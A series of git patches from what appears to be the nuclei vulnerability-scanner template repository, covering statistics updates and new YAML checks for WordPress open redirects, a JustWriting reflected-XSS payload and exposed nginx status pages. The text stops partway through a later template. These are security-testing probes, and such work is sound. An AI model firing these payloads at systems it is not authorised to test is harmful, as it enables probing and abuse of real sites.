synnefo | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | +| directions | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| pagerduty | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| pendo | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| csrfguard | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| actuator | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| digitalocean | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| placeos | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| rocketchat | 1 | | | | | | | | | +| postmark | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| hubspot | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| elasticsearch | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| messaging | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| sql | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| database | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| mailgun | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| lokalise | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| weather | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| cloud | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| contentkeeper | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| etherpad | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| playable | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| rockethchat | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| woocommerce | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| okta | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| circleci | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| roads | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| visualstudio | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| lotus | 1 | | | | | | | | | +| route | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| elfinder | 1 | | | | | | | | | +| jumpcloud | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| matrix | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| stripe | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| dropbox | 1 | | | | | | | | | +| package | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| raspap | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| asana | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| mapbox | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| key | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| gitea | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| cves2001 | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| deviantart | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| buttercms | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | | visualtools | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| manager | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| electron | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| openemr | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| nerdgraph | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| details | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 33ad69d44e..5153669a03 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 804 | daffainfo | 280 | cves | 804 | info | 661 | http | 2068 | -| lfi | 325 | pikpikcu | 277 | vulnerabilities | 311 | high | 621 | file | 46 | -| xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 | -| panel | 252 | pdteam | 199 | technologies | 200 | critical | 275 | dns | 12 | -| wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | | -| exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | -| rce | 200 | gy741 | 77 | takeovers | 64 | | | | | -| tech | 191 | pussycat0x | 70 | default-logins | 56 | | | | | -| wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | | -| cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | | +| cve | 814 | daffainfo | 285 | cves | 818 | info | 732 | http | 2155 | +| lfi | 329 | pikpikcu | 279 | vulnerabilities | 312 | high | 631 | file | 48 | +| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 465 | network | 45 | +| xss | 253 | pdteam | 200 | technologies | 201 | critical | 282 | dns | 12 | +| wordpress | 243 | geeknik | 158 | exposures | 191 | low | 155 | | | +| exposure | 237 | dwisiswant0 | 131 | misconfiguration | 137 | | | | | +| rce | 202 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 193 | pussycat0x | 71 | token-spray | 63 | | | | | +| wp-plugin | 168 | princechaddha | 64 | default-logins | 57 | | | | | +| cve2020 | 164 | zzeitlin | 63 | file | 48 | | | | | From ba9fd3f3d7ccbb4f688f11dc51d8d731526d3ebf Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 5 Oct 2021 16:36:27 +0000 Subject: [PATCH 2756/4083] Auto README Update [Tue Oct 5 16:36:27 UTC 2021] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 1c489b9cdd..28348fec47 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 804 | daffainfo | 280 | cves | 804 | info | 661 | http | 2068 | -| lfi | 325 | pikpikcu | 277 | vulnerabilities | 311 | high | 621 | file | 46 | -| xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 | -| panel | 252 | pdteam | 199 | technologies | 200 | critical | 275 | dns | 12 | -| wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | | -| exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | | -| rce | 200 | gy741 | 77 | takeovers | 64 | | | | | -| tech | 191 | pussycat0x | 70 | default-logins | 56 | | | | | -| wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | | -| cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | | +| cve | 814 | daffainfo | 285 | cves | 818 | info | 732 | http | 2155 | +| lfi | 329 | pikpikcu | 279 | vulnerabilities | 312 | high | 631 | file | 48 | +| panel | 259 | dhiyaneshdk | 268 | exposed-panels | 255 | medium | 465 | network | 45 | +| xss | 253 | pdteam | 200 | technologies | 201 | critical | 282 | dns | 12 | +| wordpress | 243 | geeknik | 158 | exposures | 191 | low | 155 | | | +| exposure | 237 | dwisiswant0 | 131 | misconfiguration | 137 | | | | | +| rce | 202 | gy741 | 81 | takeovers | 65 | | | | | +| tech | 193 | pussycat0x | 71 | token-spray | 63 | | | | | +| wp-plugin | 168 | princechaddha | 64 | default-logins | 57 | | | | | +| cve2020 | 164 | zzeitlin | 63 | file | 48 | | | | | -**166 directories, 2231 files**. +**170 directories, 2323 files**. From 8f58d37f3a3e82ceed0fa6a3fec0e5c6f052d79f Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 5 Oct 2021 23:42:16 +0530 Subject: [PATCH 2757/4083] Added missing condition --- cves/2018/CVE-2018-0127.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-0127.yaml b/cves/2018/CVE-2018-0127.yaml index 81f3f82937..1c5668b604 100644 --- a/cves/2018/CVE-2018-0127.yaml +++ b/cves/2018/CVE-2018-0127.yaml @@ -28,9 +28,10 @@ requests: - 200 - type: word + part: body + condition: and words: - "Dump" - "MDM" - "cisco" - "admin" - part: body \ No newline at end of file From 64a7c7b978598a281b6d1c717e4655a2ec2dbcfc Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Wed, 6 Oct 2021 08:49:24 +0900 Subject: [PATCH 2758/4083] Create ultimatemember-plugin-open-redirect.yaml --- ultimatemember-plugin-open-redirect.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 ultimatemember-plugin-open-redirect.yaml diff --git a/ultimatemember-plugin-open-redirect.yaml b/ultimatemember-plugin-open-redirect.yaml new file mode 100644 index 0000000000..392538b001 --- /dev/null +++ b/ultimatemember-plugin-open-redirect.yaml @@ -0,0 +1,19 @@ +id: ultimatemember-plugin-open-redirect + +info: + name: Ultimate Member < 2.1.7 - Unauthenticated Open Redirect + author: 0x_Akoko + reference: https://wpscan.com/vulnerability/97823f41-7614-420e-81b8-9e735e4c203f + severity: medium + tags: wp,redirect,wordpress + +requests: + - method: GET + path: + - "{{BaseURL}}/register/?redirect_to=https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From 0f34a6e4c575d994d8f77b5383762855a36df8d9 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Wed, 6 Oct 2021 08:51:20 +0900 Subject: [PATCH 2759/4083] Create wptouch-plugin-open-redirect.yaml --- wptouch-plugin-open-redirect.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 wptouch-plugin-open-redirect.yaml diff --git a/wptouch-plugin-open-redirect.yaml b/wptouch-plugin-open-redirect.yaml new file mode 100644 index 0000000000..c62c96f14f --- /dev/null +++ b/wptouch-plugin-open-redirect.yaml @@ -0,0 +1,19 @@ +id: wptouch-plugin-open-redirect + +info: + name: WPTouch Switch Desktop 3.x Open Redirection + author: 0x_Akoko + reference: https://cxsecurity.com/issue/WLB-2020030114 + severity: medium + tags: wp,redirect,wordpress + +requests: + - method: GET + path: + - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From f1130595cea3c3c9815133a43239c366d29ddb2a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 6 Oct 2021 10:46:16 +0530 Subject: [PATCH 2760/4083] Update and rename wptouch-plugin-open-redirect.yaml to vulnerabilities/wordpress/wptouch-open-redirect.yaml --- .../wordpress/wptouch-open-redirect.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) rename wptouch-plugin-open-redirect.yaml => vulnerabilities/wordpress/wptouch-open-redirect.yaml (68%) diff --git a/wptouch-plugin-open-redirect.yaml b/vulnerabilities/wordpress/wptouch-open-redirect.yaml similarity index 68% rename from wptouch-plugin-open-redirect.yaml rename to vulnerabilities/wordpress/wptouch-open-redirect.yaml index c62c96f14f..8f06d478a4 100644 --- a/wptouch-plugin-open-redirect.yaml +++ b/vulnerabilities/wordpress/wptouch-open-redirect.yaml @@ -1,11 +1,11 @@ -id: wptouch-plugin-open-redirect +id: wptouch-open-redirect info: name: WPTouch Switch Desktop 3.x Open Redirection author: 0x_Akoko - reference: https://cxsecurity.com/issue/WLB-2020030114 severity: medium - tags: wp,redirect,wordpress + reference: https://cxsecurity.com/issue/WLB-2020030114 + tags: wp-plugin,redirect,wordpress requests: - method: GET @@ -15,5 +15,5 @@ requests: matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' part: header From 183af8b95b10dfd717d696752e342ad22517f829 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 6 Oct 2021 10:59:48 +0530 Subject: [PATCH 2761/4083] Update and rename ultimatemember-plugin-open-redirect.yaml to vulnerabilities/wordpress/ultimatemember-open-redirect.yaml --- .../wordpress/ultimatemember-open-redirect.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) rename ultimatemember-plugin-open-redirect.yaml => vulnerabilities/wordpress/ultimatemember-open-redirect.yaml (68%) diff --git a/ultimatemember-plugin-open-redirect.yaml b/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml similarity index 68% rename from ultimatemember-plugin-open-redirect.yaml rename to vulnerabilities/wordpress/ultimatemember-open-redirect.yaml index 392538b001..84f1391b8e 100644 --- a/ultimatemember-plugin-open-redirect.yaml +++ b/vulnerabilities/wordpress/ultimatemember-open-redirect.yaml @@ -1,11 +1,11 @@ -id: ultimatemember-plugin-open-redirect +id: ultimatemember-open-redirect info: name: Ultimate Member < 2.1.7 - Unauthenticated Open Redirect author: 0x_Akoko - reference: https://wpscan.com/vulnerability/97823f41-7614-420e-81b8-9e735e4c203f severity: medium - tags: wp,redirect,wordpress + reference: https://wpscan.com/vulnerability/97823f41-7614-420e-81b8-9e735e4c203f + tags: wp-plugin,redirect,wordpress requests: - method: GET @@ -15,5 +15,5 @@ requests: matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' part: header From b38a29fcce4cff21ce9acf2ebc105008399967dd Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 6 Oct 2021 12:41:01 +0530 Subject: [PATCH 2762/4083] Create CVE-2021-41467.yaml --- cves/2021/CVE-2021-41467.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2021/CVE-2021-41467.yaml diff --git a/cves/2021/CVE-2021-41467.yaml b/cves/2021/CVE-2021-41467.yaml new file mode 100644 index 0000000000..ea9ecf2b44 --- /dev/null +++ b/cves/2021/CVE-2021-41467.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-41467 + +info: + author: madrobot + name: JustWriting - Reflected XSS + description: Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter. + severity: medium + tags: cve,cve2021,justwriting,xss + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41467 + - https://github.com/hjue/JustWriting/issues/106 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-41467 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - '{{BaseURL}}/sync/dropbox/download?challenge=%3Cscript%3Ealert(1)%3C/script%3E' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "" + part: body + condition: and + + - type: word + words: + - "text/html" + part: header From f1e4a2b15f92bf5aff5cceb9db3a5ad6cf079488 Mon Sep 17 00:00:00 2001 From: Roman Ananyev <2944373+atastycookie@users.noreply.github.com> Date: Wed, 6 Oct 2021 12:12:13 +0400 Subject: [PATCH 2763/4083] Added one more status page for NGINX --- misconfiguration/nginx/nginx-status.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/misconfiguration/nginx/nginx-status.yaml b/misconfiguration/nginx/nginx-status.yaml index 0213a72eb5..84b9419b5e 100644 --- a/misconfiguration/nginx/nginx-status.yaml +++ b/misconfiguration/nginx/nginx-status.yaml @@ -10,6 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/nginx_status" + - "{{BaseURL}}/nginx-status" matchers-condition: and matchers: From 7f9bb46eb8310542d896cdeb3824831360f5298b Mon Sep 17 00:00:00 2001 From: SaN ThosH <25719480+Mad-robot@users.noreply.github.com> Date: Wed, 6 Oct 2021 13:52:02 +0530 Subject: [PATCH 2764/4083] Create CVE-2021-41878.yaml --- cves/2021/CVE-2021-41878.yaml | 38 +++++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 cves/2021/CVE-2021-41878.yaml diff --git a/cves/2021/CVE-2021-41878.yaml b/cves/2021/CVE-2021-41878.yaml new file mode 100644 index 0000000000..02acb4800a --- /dev/null +++ b/cves/2021/CVE-2021-41878.yaml @@ -0,0 +1,38 @@ +id: CVE-2021-41878 + +info: + author: madrobot + name: JustWriting - Reflected 